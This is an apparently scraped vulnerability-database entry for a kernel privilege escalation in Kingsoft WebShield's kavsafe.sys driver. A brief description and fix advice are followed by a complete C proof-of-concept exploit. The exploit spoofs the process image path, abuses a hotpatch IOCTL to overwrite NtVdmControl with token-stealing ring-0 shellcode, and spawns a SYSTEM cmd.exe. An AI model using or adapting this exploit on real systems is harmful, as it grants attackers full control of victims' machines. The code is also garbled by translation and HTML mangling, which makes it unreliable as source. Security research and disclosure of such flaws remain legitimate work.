Kingsoft Network Security Local Elevation of Privilege Vulnerability

Kingsoft WebShield kavsafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
SSV ID: WebShield kavsafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation
Affected Versions:
Kingsoft WebShield <= (2010.5.23)

Signature Date: 2010-5-23 2:33:54


KAVSafe.sys <= 2010.4.14.609
Signature Date: 2010-4-14 13:42:26
Vulnerability description:
KAVSafe.sys creates a device named \Device\KAVSafe and handles the DeviceIoControl request with IoControlCode 0x830020d4, which can be used to overwrite arbitrary kernel module data. The proof-of-concept below reaches this handler from an ordinary user-mode process (the IOCTL is defined with FILE_ANY_ACCESS, and the only gate appears to be a check on the caller's image path, which the PoC defeats by temporarily rewriting ImagePathName in its own PEB), so any local user can turn this kernel-memory write into a privilege escalation. The fix is to protect the device object with a restrictive security descriptor and to remove, or strictly validate, the caller-supplied patch target and data in the IOCTL handler.
The program (method) provided on this site may be offensive and is to be used only for security research and teaching. Use it at your own risk.


# Define ctl_code (0x8300, 0x835, method_buffered, file_any_access) <br/> typedef long (winapi * pnt_query_information_process) (<br/> handle processhandle, <br/> DWORD processinformationclass, <br/> pvoid processinformation, <br/> ulong processinformationlength, <br/> Pulong returnlength <br/> ); <br/> typedef struct _ string {<br/> ushort length; <br/> ushort maximumleng Th; <br/> pchar buffer; <br/>}string; <br/> typedef string * pstring; <br/> typedef struct _ rtl_drive_letter_curdir {<br/> ushort flags; <br/> ushort length; <br/> ulong timestamp; <br/> string dospath; <br/>} rtl_drive_letter_curdir, * delimiter; <br/> typedef struct _ unicode_string {<br/> ushort length; <br/> ushort maximumlength; <br/> pwstr buffer; <br/>} unicode_string; <br/> type Def unicode_string * punicode_string; <br/> typedef const unicode_string * pcunicode_string; <br/> # define rtl_max_drive_letters 32 <br/> # define rtl_drive_letter_valid) 0x0001 <br/> typedef struct _ curdir {<br/> unicode_string dospath; <br/> handle; <br/>}curdir, * pcurdir; <br/> typedef struct _ rtl_user_process_parameters {<br/> ulong maximumlength; <br/> ulong length; </P> <p> ulong flag S; <br/> ulong debugflags; </P> <p> handle consolehandle; <br/> ulong consoleflags; <br/> handle standardinput; <br/> handle standardoutput; <br/> handle standarderror; </P> <p> curdir currentdirectory; // processparameters <br/> unicode_string dllpath; // processparameters <br/> unicode_string imagepathname; // processparameters <br/> unicode_string CommandLine; // processparameters <br/> pvoid envir Onment; // ntallocatevirtualmemory </P> <p> ulong startingx; <br/> ulong startingy; <br/> ulong countx; <br/> ulong county; <br/> ulong countcharsx; <br/> ulong countcharsy; <br/> ulong fillattriags; </P> <p> ulong windowflags; <br/> ulong showwindowflags; <br/> unicode_string windowtitle; // processparameters <br/> unicode_string returns topinfo; // processparameters <br/> unicode_string shellinfo; // P Rocessparameters 
<br/> unicode_string runtimedata; // processparameters <br/> using currentdirectores [rtl_max_drive_letters]; <br/>} rtl_user_process_parameters, * parameters; <br/> typedef struct _ peb {<br/> Boolean inheritedaddressspace; // these four fields cannot change unless the <br/> Boolean readimagefileexecoptions; // <br/> Boolean beingdebugged; // <br /> Boolean sparebool; // <br/> handle mutant; // initial_peb structure is also updated. </P> <p> pvoid imagebaseaddress; <br/> pvoid LDR; <br/> struct _ rtl_user_process_parameters * processparameters; <br/>} peb, * ppeb; <br/> typedef long kpriority; <br/> typedef struct _ process_basic_information {<br/> long exitstatus; <br/> pvoid pebbaseaddress; <br/> ulong_ptr affinitymask; <br/> kpriority basepri Ority; <br/> ulong_ptr uniqueprocessid; <br/> ulong_ptr identifier; <br/>} process_basic_information, * pprocess_basic_information; <br/> typedef struct {<br/> ulong unknown1; <br/> ulong unknown2; <br/> pvoid base; <br/> ulong size; <br/> ulong flags; <br/> ushort index; <br/> ushort namelength; <br/> ushort loadcount; <br/> ushort pathlength; <br/> char imagename [1, 256]; <br/>} sys Struct, * struct; <br/> typedef struct {<br/> ulong count; <br/> system_module_information_entry module [1]; <br/>} x_system_module_information, * px_system_module_information; <br/> typedef long (winapi * pnt_query_system_information) (<br/> long systeminformationclass, <br/> pvoid systeminformation, <br/> ulong systeminformationlength, <br/> Pulong RET Urnlength <br/>); <br/> # define ntcurrentprocess () (handle) (long_ptr)-1) <br/> typedef long (winapi * pnt_vdm_control) (<br/> ulong service, <br/> pvoid servicedata <br/>); <br/> void _ declspec (naked) r0shellcodexp () <br/>{< br/>__ ASM <br/>{< br/> mov eax, 0xffdff124 <br/> mov eax, [eax] <br/> mov ESI, dword ptr [eax + 0x220] <br/> mov eax, ESI <br/> searchxp: <br/> mov eax, dword ptr [eax + 0x88] <br/> sub EA X, 0x88 <br/> mov edX, dword ptr [eax + 0x84] <br/> CMP edX, 4 <br/> jnz 
searchxp <br/> mov eax, dword ptr [eax + 0xc8] <br/> mov dword ptr [ESI + 0xc8], eax <br/> RET 8 <br/>}< br/> void nopnop () <br/>{< br/> printf ("Nop! /N "); <br/>}< br/> # include" malloc. H "<br/> int main (INT argc, char * argv []) <br/>{< br/> printf (" kswebshield kavsafe. sys <= 2010,04, 14,609/N "<br/>" kernel mode Privilege Escalation Vulnerability proof-of-concept/N "<br/>" 2010-5-23/N "<br/>" by lincoin/n/npress enter "); <br/> hkey; <br/> wchar installpath [max_path]; <br/> DWORD datatype; <br/> DWORD datasize = max_path * sizeof (wchar ); <br/> ulong Oldlen; <br/> pvoid poldbufferdata = NULL; <br/> If (regopenkey (HKEY_LOCAL_MACHINE, "software // Kingsoft // kswsvc", & hkey) = error_success) <br/>{< br/> If (regqueryvalueexw (hkey, l "programpath", null, & datatype, (lpbyte) installpath, & datasize )! = Error_success) <br/>{< br/> regclosekey (hkey); <br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> regclosekey (hkey ); <br/>}< br/> else <br/> {<br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> wcscat (installpath, l "// kavinst.exe"); </P> <p> process_basic_information PBI; <br/> pnt_query_information_process pntqueryinformationpr Ocess; </P> <p> pntqueryinformationprocess = (pnt_query_information_process) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntqueryinformationprocess "); </P> <p> pntqueryinformationprocess (ntcurrentprocess (), 0, & PBI, sizeof (PBI), null ); <br/> ppeb peb; <br/> peb = (ppeb) PBI. pebbaseaddress; <br/> oldlen = peb-> processparameters-> imagepathname. length; <br/> peb-> processparameters-> imagepathname. length = Wcslen (installpath) * sizeof (wchar); <br/> poldbufferdata = malloc (peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (poldbufferdata, peb-> processparameters-> imagepathname. buffer, peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (peb-> processparameters-> imagepathname. 
buffer, installpath, peb-> processparameters-> imagepathname. length); <br/> handle hdev = createfile ("////. // Kavsafe ", <br/> file_read_attributes, <br/> file_share_read, <br/> 0, <br/> open_existing, <br/> 0, <br/> 0); <br/> If (hdev = invalid_handle_value) <br/>{< br/> printf ("cannot open device % u/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, poldbufferdata, peb-> processparameters-> imagepathname. length); <br/> peb-> Process Parameters-> imagepathname. length = (ushort) oldlen; </P> <p> pnt_query_system_information pntquerysysteminformation; <br/> pntquerysysteminformation = (pnt_query_system_information) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntquerysysteminformation "); <br/> x_system_module_information sysmod; <br/> hmodule kernelhandle; <br/> pntquerysysteminformation (0xb, & sysmod, sizeof (sysmod ), null); </P> <p> K Ernelhandle = loadlibrary (strrchr (sysmod. module [0]. imagename, '//') + 1); </P> <p> If (kernelhandle = 0) <br/>{< br/> printf ("cannot load ntoskrnl! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pvoid pntvdmcontrol = getprocaddress (kernelhandle, "ntvdmcontrol"); <br/> If (pntvdmcontrol = 0) <br/> {<br/> printf ("cannot find ntvdmcontrol! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pntvdmcontrol = (pvoid) (ulong) pntvdmcontrol-(ulong) kernelhandle); <br/> printf ("ntvdmcontrol = % 08x", pntvdmcontrol); </P> <p> getchar (); <br/> ulong shellcodesize = (ulong) nopnop-(ulong) r0shellcodexp; <br/> ulong pshellcode = (ulong) r0shellcodexp; </P> <p> pvoid DATA = malloc (0x48 + shellcodesize); <br/> copymemory (pvoid) (ulong) Data + 0x48), r0sh Ellcodexp, shellcodesize); </P> <p> char modulename [68] = "ntoskrnl.exe"; <br/> rtlcopymemory (data, modulename, sizeof (modulename )); <br/> * (ulong *) (ulong) Data + 64) = (ulong) pntvdmcontrol; <br/> * (ulong *) (ulong) Data + 68) = shellcodesize; </P> <p> ulong BTR; <br/> If (! 
Deviceiocontrol (hdev, <br/> ioctl_hotpatch_kernel_module, <br/> data, <br/> 0x48 + shellcodesize, <br/> null, <br/> 0, <br/> & BTR, 0 <br/>) <br/> {<br/> printf ("cannot device Io control! % U/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> closehandle (hdev ); <br/> pnt_vdm_control pr3ntvdmcontrol = (pnt_vdm_control) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntvdmcontrol "); <br/> pr3ntvdmcontrol (0, 0); </P> <p> winexec (" cmd.exe ", sw_show ); <br/> printf ("OK! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/>



